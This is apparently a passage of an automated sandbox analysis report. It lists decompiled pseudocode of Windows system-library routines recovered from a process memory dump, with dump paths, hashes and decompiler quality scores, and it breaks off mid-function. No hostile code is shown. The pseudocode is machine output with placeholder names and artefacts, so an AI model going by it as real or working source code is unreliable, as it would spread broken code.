                                        			E053A8A0A(intOrPtr* __ecx, signed int __edx) {
                                        				signed int _v8;
                                        				char _v524;
                                        				signed int _v528;
                                        				void* _v532;
                                        				char _v536;
                                        				char _v540;
                                        				char _v544;
                                        				intOrPtr* _v548;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t44;
                                        				void* _t46;
                                        				void* _t48;
                                        				signed int _t53;
                                        				signed int _t55;
                                        				intOrPtr* _t62;
                                        				void* _t63;
                                        				unsigned int _t75;
                                        				signed int _t79;
                                        				unsigned int _t81;
                                        				unsigned int _t83;
                                        				signed int _t84;
                                        				void* _t87;
                                        
                                        				_t76 = __edx;
                                        				_v8 =  *0x548d360 ^ _t84;
                                        				_v536 = 0x200;
                                        				_t79 = 0;
                                        				_v548 = __edx;
                                        				_v544 = 0;
                                        				_t62 = __ecx;
                                        				_v540 = 0;
                                        				_v532 =  &_v524;
                                        				if(__edx == 0 || __ecx == 0) {
                                        					L6:
                                        					return E053DB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                                        				} else {
                                        					_v528 = 0;
                                        					E053AE9C0(1, __ecx, 0, 0,  &_v528);
                                        					_t44 = _v528;
                                        					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                                        					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                                        					_t46 = 0xa;
                                        					_t87 = _t81 - _t46;
                                        					if(_t87 > 0 || _t87 == 0) {
                                        						 *_v548 = 0x5371180;
                                        						L5:
                                        						_t79 = 1;
                                        						goto L6;
                                        					} else {
                                        						_t48 = E053C1DB5(_t62,  &_v532,  &_v536);
                                        						_t76 = _v528;
                                        						if(_t48 == 0) {
                                        							L9:
                                        							E053D3C2A(_t81, _t76,  &_v544);
                                        							 *_v548 = _v544;
                                        							goto L5;
                                        						}
                                        						_t62 = _v532;
                                        						if(_t62 != 0) {
                                        							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                                        							_t53 =  *_t62;
                                        							_v528 = _t53;
                                        							if(_t53 != 0) {
                                        								_t63 = _t62 + 4;
                                        								_t55 = _v528;
                                        								do {
                                        									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                                        										if(E053A8999(_t63,  &_v540) == 0) {
                                        											_t55 = _v528;
                                        										} else {
                                        											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                                        											_t55 = _v528;
                                        											if(_t75 >= _t83) {
                                        												_t83 = _t75;
                                        											}
                                        										}
                                        									}
                                        									_t63 = _t63 + 0x14;
                                        									_t55 = _t55 - 1;
                                        									_v528 = _t55;
                                        								} while (_t55 != 0);
                                        								_t62 = _v532;
                                        							}
                                        							if(_t62 !=  &_v524) {
                                        								L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                                        							}
                                        							_t76 = _t83 & 0x0000ffff;
                                        							_t81 = _t83 >> 0x10;
                                        						}
                                        						goto L9;
                                        					}
                                        				}
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e17b7db8ba6f9a3986687e464f615620e44ee13fcef93470173888bfd88b262b
                                        • Instruction ID: f2b26187e59e9b28a1c21365b0c62ff82df3419dc9e4bd58d7ae314d070799b7
                                        • Opcode Fuzzy Hash: e17b7db8ba6f9a3986687e464f615620e44ee13fcef93470173888bfd88b262b
                                        • Instruction Fuzzy Hash: 7D4160B6A0122C9BDB24DF15DC88AB9F7F9FB44300F1045E9D81997251EB709E81CF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 69%
                                        			E054169A6(signed short* __ecx, void* __eflags) {
                                        				signed int _v8;
                                        				signed int _v16;
                                        				intOrPtr _v20;
                                        				signed int _v24;
                                        				signed short _v28;
                                        				signed int _v32;
                                        				intOrPtr _v36;
                                        				signed int _v40;
                                        				char* _v44;
                                        				signed int _v48;
                                        				intOrPtr _v52;
                                        				signed int _v56;
                                        				char _v60;
                                        				signed int _v64;
                                        				char _v68;
                                        				char _v72;
                                        				signed short* _v76;
                                        				signed int _v80;
                                        				char _v84;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* _t68;
                                        				intOrPtr _t73;
                                        				signed short* _t74;
                                        				void* _t77;
                                        				void* _t78;
                                        				signed int _t79;
                                        				signed int _t80;
                                        
                                        				_v8 =  *0x548d360 ^ _t80;
                                        				_t75 = 0x100;
                                        				_v64 = _v64 & 0x00000000;
                                        				_v76 = __ecx;
                                        				_t79 = 0;
                                        				_t68 = 0;
                                        				_v72 = 1;
                                        				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                                        				_t77 = 0;
                                        				if(L053A6C59(__ecx[2], 0x100, __eflags) != 0) {
                                        					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                        					if(_t79 != 0 && E05416BA3() != 0) {
                                        						_push(0);
                                        						_push(0);
                                        						_push(0);
                                        						_push(0x1f0003);
                                        						_push( &_v64);
                                        						if(E053D9980() >= 0) {
                                        							E053B2280(_t56, 0x5488778);
                                        							_t77 = 1;
                                        							_t68 = 1;
                                        							if( *0x5488774 == 0) {
                                        								asm("cdq");
                                        								 *(_t79 + 0xf70) = _v64;
                                        								 *(_t79 + 0xf74) = 0x100;
                                        								_t75 = 0;
                                        								_t73 = 4;
                                        								_v60 =  &_v68;
                                        								_v52 = _t73;
                                        								_v36 = _t73;
                                        								_t74 = _v76;
                                        								_v44 =  &_v72;
                                        								 *0x5488774 = 1;
                                        								_v56 = 0;
                                        								_v28 = _t74[2];
                                        								_v48 = 0;
                                        								_v20 = ( *_t74 & 0x0000ffff) + 2;
                                        								_v40 = 0;
                                        								_v32 = 0;
                                        								_v24 = 0;
                                        								_v16 = 0;
                                        								if(E0539B6F0(0x537c338, 0x537c288, 3,  &_v60) == 0) {
                                        									_v80 = _v80 | 0xffffffff;
                                        									_push( &_v84);
                                        									_push(0);
                                        									_push(_v64);
                                        									_v84 = 0xfa0a1f00;
                                        									E053D9520();
                                        								}
                                        							}
                                        						}
                                        					}
                                        				}
                                        				if(_v64 != 0) {
                                        					_push(_v64);
                                        					E053D95D0();
                                        					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                                        					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                                        				}
                                        				if(_t77 != 0) {
                                        					E053AFFB0(_t68, _t77, 0x5488778);
                                        				}
                                        				_pop(_t78);
                                        				return E053DB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                                        			}


                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1578100296488af851a01e553a21c81be8a8b6e0a484f12687bfccaf64752e2e
                                        • Instruction ID: ec6ddc80eb98f03a1ce0f4c81eeea5392c42992f13b0a18f637e08227397d5fe
                                        • Opcode Fuzzy Hash: 1578100296488af851a01e553a21c81be8a8b6e0a484f12687bfccaf64752e2e
                                        • Instruction Fuzzy Hash: CB4177B2E00208AFDB24DFA5D940BFEBBF8FF48714F14856AE815A7240DB749905CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E053D3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                        				intOrPtr _v8;
                                        				char _v12;
                                        				signed short** _t33;
                                        				short* _t38;
                                        				intOrPtr* _t39;
                                        				intOrPtr* _t41;
                                        				signed short _t43;
                                        				intOrPtr* _t47;
                                        				intOrPtr* _t53;
                                        				signed short _t57;
                                        				intOrPtr _t58;
                                        				signed short _t60;
                                        				signed short* _t61;
                                        
                                        				_t47 = __ecx;
                                        				_t61 = __edx;
                                        				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                        				if(_t60 > 0xfffe) {
                                        					L22:
                                        					return 0xc0000106;
                                        				}
                                        				if(__edx != 0) {
                                        					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                        						L5:
                                        						E053A7B60(0, _t61, 0x53711c4);
                                        						_v12 =  *_t47;
                                        						_v12 = _v12 + 0xfff8;
                                        						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                        						E053A7B60(0xfff8, _t61,  &_v12);
                                        						_t33 = _a8;
                                        						if(_t33 != 0) {
                                        							 *_t33 = _t61;
                                        						}
                                        						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                        						_t53 = _a12;
                                        						if(_t53 != 0) {
                                        							_t57 = _t61[2];
                                        							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                        							while(_t38 >= _t57) {
                                        								if( *_t38 == 0x5c) {
                                        									_t41 = _t38 + 2;
                                        									if(_t41 == 0) {
                                        										break;
                                        									}
                                        									_t58 = 0;
                                        									if( *_t41 == 0) {
                                        										L19:
                                        										 *_t53 = _t58;
                                        										goto L7;
                                        									}
                                        									 *_t53 = _t41;
                                        									goto L7;
                                        								}
                                        								_t38 = _t38 - 2;
                                        							}
                                        							_t58 = 0;
                                        							goto L19;
                                        						} else {
                                        							L7:
                                        							_t39 = _a16;
                                        							if(_t39 != 0) {
                                        								 *_t39 = 0;
                                        								 *((intOrPtr*)(_t39 + 4)) = 0;
                                        								 *((intOrPtr*)(_t39 + 8)) = 0;
                                        								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                        							}
                                        							return 0;
                                        						}
                                        					}
                                        					_t61 = _a4;
                                        					if(_t61 != 0) {
                                        						L3:
                                        						_t43 = L053B4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                        						_t61[2] = _t43;
                                        						if(_t43 == 0) {
                                        							return 0xc0000017;
                                        						}
                                        						_t61[1] = _t60;
                                        						 *_t61 = 0;
                                        						goto L5;
                                        					}
                                        					goto L22;
                                        				}
                                        				_t61 = _a4;
                                        				if(_t61 == 0) {
                                        					return 0xc000000d;
                                        				}
                                        				goto L3;
                                        			}


                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 01e93f5d7d63ab1c06d770e2af89d5524418fca70cea89101940f8fd24e5ee6c
                                        • Instruction ID: ceeaf5b27bd987f2795635ade076beef8c8fec181530c675740dd602fd3379da
                                        • Opcode Fuzzy Hash: 01e93f5d7d63ab1c06d770e2af89d5524418fca70cea89101940f8fd24e5ee6c
                                        • Instruction Fuzzy Hash: AA319073A056149BC724CF29E441A7BFBBAFF45700B15886AE846CB790E674DC50CBA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 78%
                                        			E053CA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                        				intOrPtr _t35;
                                        				intOrPtr _t39;
                                        				intOrPtr _t45;
                                        				intOrPtr* _t51;
                                        				intOrPtr* _t52;
                                        				intOrPtr* _t55;
                                        				signed int _t57;
                                        				intOrPtr* _t59;
                                        				intOrPtr _t68;
                                        				intOrPtr* _t77;
                                        				void* _t79;
                                        				signed int _t80;
                                        				intOrPtr _t81;
                                        				char* _t82;
                                        				void* _t83;
                                        
                                        				_push(0x24);
                                        				_push(0x5470220);
                                        				E053ED08C(__ebx, __edi, __esi);
                                        				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                                        				_t79 = __ecx;
                                        				_t35 =  *0x5487b9c; // 0x0
                                        				_t55 = L053B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                                        				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                                        				if(_t55 == 0) {
                                        					_t39 = 0xc0000017;
                                        					L11:
                                        					return E053ED0D1(_t39);
                                        				}
                                        				_t68 = 0;
                                        				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                                        				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                                        				_t7 = _t55 + 8; // 0x8
                                        				_t57 = 6;
                                        				memcpy(_t7, _t79, _t57 << 2);
                                        				_t80 = 0xfffffffe;
                                        				 *(_t83 - 4) = _t80;
                                        				if(0 < 0) {
                                        					L14:
                                        					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                        					L20:
                                        					L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                                        					_t39 = _t81;
                                        					goto L11;
                                        				}
                                        				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                                        					_t81 = 0xc000007b;
                                        					goto L20;
                                        				}
                                        				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                                        					_t59 =  *((intOrPtr*)(_t83 + 8));
                                        					_t45 =  *_t59;
                                        					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                                        					 *_t59 = _t45 + 1;
                                        					L6:
                                        					 *(_t83 - 4) = 1;
                                        					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                                        					 *(_t83 - 4) = _t80;
                                        					if(_t68 < 0) {
                                        						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                                        						if(_t82 == 0) {
                                        							goto L14;
                                        						}
                                        						asm("btr eax, ecx");
                                        						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                        						if( *_t82 != 0) {
                                        							 *0x5487b10 =  *0x5487b10 - 8;
                                        						}
                                        						goto L20;
                                        					}
                                        					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                                        					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                                        					_t51 =  *0x548536c; // 0x32fade8
                                        					if( *_t51 != 0x5485368) {
                                        						_push(3);
                                        						asm("int 0x29");
                                        						goto L14;
                                        					}
                                        					 *_t55 = 0x5485368;
                                        					 *((intOrPtr*)(_t55 + 4)) = _t51;
                                        					 *_t51 = _t55;
                                        					 *0x548536c = _t55;
                                        					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                                        					if(_t52 != 0) {
                                        						 *_t52 = _t55;
                                        					}
                                        					_t39 = 0;
                                        					goto L11;
                                        				}
                                        				_t77 =  *((intOrPtr*)(_t83 + 8));
                                        				_t68 = E053CA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                                        				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                                        				if(_t68 < 0) {
                                        					goto L14;
                                        				}
                                        				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                                        				goto L6;
                                        			}


                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6a8724b0c489766bd30715661d894cc889ee9eab1aacc27284885d45e0c2f183
                                        • Instruction ID: 34d433544c38677fe3bf504213fd40b64be36dc1f9594e645c11ff4ce02abaab
                                        • Opcode Fuzzy Hash: 6a8724b0c489766bd30715661d894cc889ee9eab1aacc27284885d45e0c2f183
                                        • Instruction Fuzzy Hash: DE414775A05209DFCB09DF58C894BE9BBF2FB49314F2980AEE805AB385D775AD01CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 68%
                                        			E053BC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                        				signed int* _v8;
                                        				char _v16;
                                        				void* __ebx;
                                        				void* __edi;
                                        				signed char _t33;
                                        				signed char _t43;
                                        				signed char _t48;
                                        				signed char _t62;
                                        				void* _t63;
                                        				intOrPtr _t69;
                                        				intOrPtr _t71;
                                        				unsigned int* _t82;
                                        				void* _t83;
                                        
                                        				_t80 = __ecx;
                                        				_t82 = __edx;
                                        				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                        				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                        				if((_t33 & 0x00000001) != 0) {
                                        					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                        					if(E053B7D50() != 0) {
                                        						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                        					} else {
                                        						_t43 = 0x7ffe0386;
                                        					}
                                        					if( *_t43 != 0) {
                                        						_t43 = E05468D34(_v8, _t80);
                                        					}
                                        					E053B2280(_t43, _t82);
                                        					if( *((char*)(_t80 + 0xdc)) == 0) {
                                        						E053AFFB0(_t62, _t80, _t82);
                                        						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                        						_t30 = _t80 + 0xd0; // 0xd0
                                        						_t83 = _t30;
                                        						E05468833(_t83,  &_v16);
                                        						_t81 = _t80 + 0x90;
                                        						E053AFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                        						_t63 = 0;
                                        						_push(0);
                                        						_push(_t83);
                                        						_t48 = E053DB180();
                                        						if(_a4 != 0) {
                                        							E053B2280(_t48, _t81);
                                        						}
                                        					} else {
                                        						_t69 = _v8;
                                        						_t12 = _t80 + 0x98; // 0x98
                                        						_t13 = _t69 + 0xc; // 0x575651ff
                                        						E053BBB2D(_t13, _t12);
                                        						_t71 = _v8;
                                        						_t15 = _t80 + 0xb0; // 0xb0
                                        						_t16 = _t71 + 8; // 0x8b000cc2
                                        						E053BBB2D(_t16, _t15);
                                        						E053BB944(_v8, _t62);
                                        						 *((char*)(_t80 + 0xdc)) = 0;
                                        						E053AFFB0(0, _t80, _t82);
                                        						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                        						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                        						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                        						 *(_t80 + 0xde) = 0;
                                        						if(_a4 == 0) {
                                        							_t25 = _t80 + 0x90; // 0x90
                                        							E053AFFB0(0, _t80, _t25);
                                        						}
                                        						_t63 = 1;
                                        					}
                                        					return _t63;
                                        				}
                                        				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                        				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                        				if(_a4 == 0) {
                                        					_t24 = _t80 + 0x90; // 0x90
                                        					E053AFFB0(0, __ecx, _t24);
                                        				}
                                        				return 0;
                                        			}

















                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                        • Instruction ID: 612bbeabec82da2a36faca13ff3cc99d5e22f387d72cab1d6f4ff65c745c8363
                                        • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                        • Instruction Fuzzy Hash: 37314872B0558BBFEB14EBB0C494BEAF769BF42200F14815AD5185B741DBB45E09C7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 76%
                                        			E05417016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                        				signed int _v8;
                                        				char _v588;
                                        				intOrPtr _v592;
                                        				intOrPtr _v596;
                                        				signed short* _v600;
                                        				char _v604;
                                        				short _v606;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed short* _t55;
                                        				void* _t56;
                                        				signed short* _t58;
                                        				signed char* _t61;
                                        				char* _t68;
                                        				void* _t69;
                                        				void* _t71;
                                        				void* _t72;
                                        				signed int _t75;
                                        
                                        				_t64 = __edx;
                                        				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                        				_v8 =  *0x548d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                        				_t55 = _a16;
                                        				_v606 = __ecx;
                                        				_t71 = 0;
                                        				_t58 = _a12;
                                        				_v596 = __edx;
                                        				_v600 = _t58;
                                        				_t68 =  &_v588;
                                        				if(_t58 != 0) {
                                        					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                        					if(_t55 != 0) {
                                        						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                        					}
                                        				}
                                        				_t8 = _t71 + 0x2a; // 0x28
                                        				_t33 = _t8;
                                        				_v592 = _t8;
                                        				if(_t71 <= 0x214) {
                                        					L6:
                                        					 *((short*)(_t68 + 6)) = _v606;
                                        					if(_t64 != 0xffffffff) {
                                        						asm("cdq");
                                        						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                        						 *((char*)(_t68 + 0x28)) = _a4;
                                        						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                        						 *((char*)(_t68 + 0x29)) = _a8;
                                        						if(_t71 != 0) {
                                        							_t22 = _t68 + 0x2a; // 0x2a
                                        							_t64 = _t22;
                                        							E05416B4C(_t58, _t22, _t71,  &_v604);
                                        							if(_t55 != 0) {
                                        								_t25 = _v604 + 0x2a; // 0x2a
                                        								_t64 = _t25 + _t68;
                                        								E05416B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                        							}
                                        							if(E053B7D50() == 0) {
                                        								_t61 = 0x7ffe0384;
                                        							} else {
                                        								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                        							}
                                        							_push(_t68);
                                        							_push(_v592 + 0xffffffe0);
                                        							_push(0x402);
                                        							_push( *_t61 & 0x000000ff);
                                        							E053D9AE0();
                                        						}
                                        					}
                                        					_t35 =  &_v588;
                                        					if( &_v588 != _t68) {
                                        						_t35 = L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                        					}
                                        					L16:
                                        					_pop(_t69);
                                        					_pop(_t72);
                                        					_pop(_t56);
                                        					return E053DB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                        				}
                                        				_t68 = L053B4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                        				if(_t68 == 0) {
                                        					goto L16;
                                        				} else {
                                        					_t58 = _v600;
                                        					_t64 = _v596;
                                        					goto L6;
                                        				}
                                        			}























                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a1ab742b12d539eabf872b0302277516ea14594309f8967d80cef7ee81443540
                                        • Instruction ID: 7fde156d25c537693e520808efab766c68674a0e32405a21dca3e335ceb5fcbd
                                        • Opcode Fuzzy Hash: a1ab742b12d539eabf872b0302277516ea14594309f8967d80cef7ee81443540
                                        • Instruction Fuzzy Hash: D431A2726087519BC320DF28C944AABB7E5FF88700F054A6EFD9697790E730E904C7A9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 92%
                                        			E053CA70E(intOrPtr* __ecx, char* __edx) {
                                        				unsigned int _v8;
                                        				intOrPtr* _v12;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* _t16;
                                        				intOrPtr _t17;
                                        				intOrPtr _t28;
                                        				char* _t33;
                                        				intOrPtr _t37;
                                        				intOrPtr _t38;
                                        				void* _t50;
                                        				intOrPtr _t52;
                                        
                                        				_push(__ecx);
                                        				_push(__ecx);
                                        				_t52 =  *0x5487b10; // 0x8
                                        				_t33 = __edx;
                                        				_t48 = __ecx;
                                        				_v12 = __ecx;
                                        				if(_t52 == 0) {
                                        					 *0x5487b10 = 8;
                                        					 *0x5487b14 = 0x5487b0c;
                                        					 *0x5487b18 = 1;
                                        					L6:
                                        					_t2 = _t52 + 1; // 0x9
                                        					E053CA990(0x5487b10, _t2, 7);
                                        					asm("bts ecx, eax");
                                        					 *_t48 = _t52;
                                        					 *_t33 = 1;
                                        					L3:
                                        					_t16 = 0;
                                        					L4:
                                        					return _t16;
                                        				}
                                        				_t17 = L053CA840(__edx, __ecx, __ecx, _t52, 0x5487b10, 1, 0);
                                        				if(_t17 == 0xffffffff) {
                                        					_t37 =  *0x5487b10; // 0x8
                                        					_t3 = _t37 + 0x27; // 0x2f
                                        					__eflags = _t3 >> 5 -  *0x5487b18; // 0x1
                                        					if(__eflags > 0) {
                                        						_t38 =  *0x5487b9c; // 0x0
                                        						_t4 = _t52 + 0x27; // 0x2f
                                        						_v8 = _t4 >> 5;
                                        						_t50 = L053B4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                                        						__eflags = _t50;
                                        						if(_t50 == 0) {
                                        							_t16 = 0xc0000017;
                                        							goto L4;
                                        						}
                                        						 *0x5487b18 = _v8;
                                        						_t8 = _t52 + 7; // 0xf
                                        						E053DF3E0(_t50,  *0x5487b14, _t8 >> 3);
                                        						_t28 =  *0x5487b14; // 0x77f07b0c
                                        						__eflags = _t28 - 0x5487b0c;
                                        						if(_t28 != 0x5487b0c) {
                                        							L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                        						}
                                        						_t9 = _t52 + 8; // 0x10
                                        						 *0x5487b14 = _t50;
                                        						_t48 = _v12;
                                        						 *0x5487b10 = _t9;
                                        						goto L6;
                                        					}
                                        					 *0x5487b10 = _t37 + 8;
                                        					goto L6;
                                        				}
                                        				 *__ecx = _t17;
                                        				 *_t33 = 0;
                                        				goto L3;
                                        			}

















                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 48e354ba352e7322de865966177f92cafa92241b949762f0ff8c4ad5eeced760
                                        • Instruction ID: 1174d749423804c89c7e65d1d38089a861d2cd528c2279c18a6e0230c3535aed
                                        • Opcode Fuzzy Hash: 48e354ba352e7322de865966177f92cafa92241b949762f0ff8c4ad5eeced760
                                        • Instruction Fuzzy Hash: C831EFB16102089BC715CB48D8A9FA97FFBFB84254F28099EE015C7245DBB29D00CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 97%
                                        			E053C61A0(signed int* __ecx) {
                                        				intOrPtr _v8;
                                        				char _v12;
                                        				intOrPtr* _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _t30;
                                        				intOrPtr _t31;
                                        				void* _t32;
                                        				intOrPtr _t33;
                                        				intOrPtr _t37;
                                        				intOrPtr _t49;
                                        				signed int _t51;
                                        				intOrPtr _t52;
                                        				signed int _t54;
                                        				void* _t59;
                                        				signed int* _t61;
                                        				intOrPtr* _t64;
                                        
                                        				_t61 = __ecx;
                                        				_v12 = 0;
                                        				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                        				_v16 = __ecx;
                                        				_v8 = 0;
                                        				if(_t30 == 0) {
                                        					L6:
                                        					_t31 = 0;
                                        					L7:
                                        					return _t31;
                                        				}
                                        				_t32 = _t30 + 0x5d8;
                                        				if(_t32 == 0) {
                                        					goto L6;
                                        				}
                                        				_t59 = _t32 + 0x30;
                                        				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                                        					goto L6;
                                        				}
                                        				if(__ecx != 0) {
                                        					 *((intOrPtr*)(__ecx)) = 0;
                                        					 *((intOrPtr*)(__ecx + 4)) = 0;
                                        				}
                                        				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                                        					_t51 =  *(_t32 + 0x10);
                                        					_t33 = _t32 + 0x10;
                                        					_v20 = _t33;
                                        					_t54 =  *(_t33 + 4);
                                        					if((_t51 | _t54) == 0) {
                                        						_t37 = E053C5E50(0x53767cc, 0, 0,  &_v12);
                                        						if(_t37 != 0) {
                                        							goto L6;
                                        						}
                                        						_t52 = _v8;
                                        						asm("lock cmpxchg8b [esi]");
                                        						_t64 = _v16;
                                        						_t49 = _t37;
                                        						_v20 = 0;
                                        						if(_t37 == 0) {
                                        							if(_t64 != 0) {
                                        								 *_t64 = _v12;
                                        								 *((intOrPtr*)(_t64 + 4)) = _t52;
                                        							}
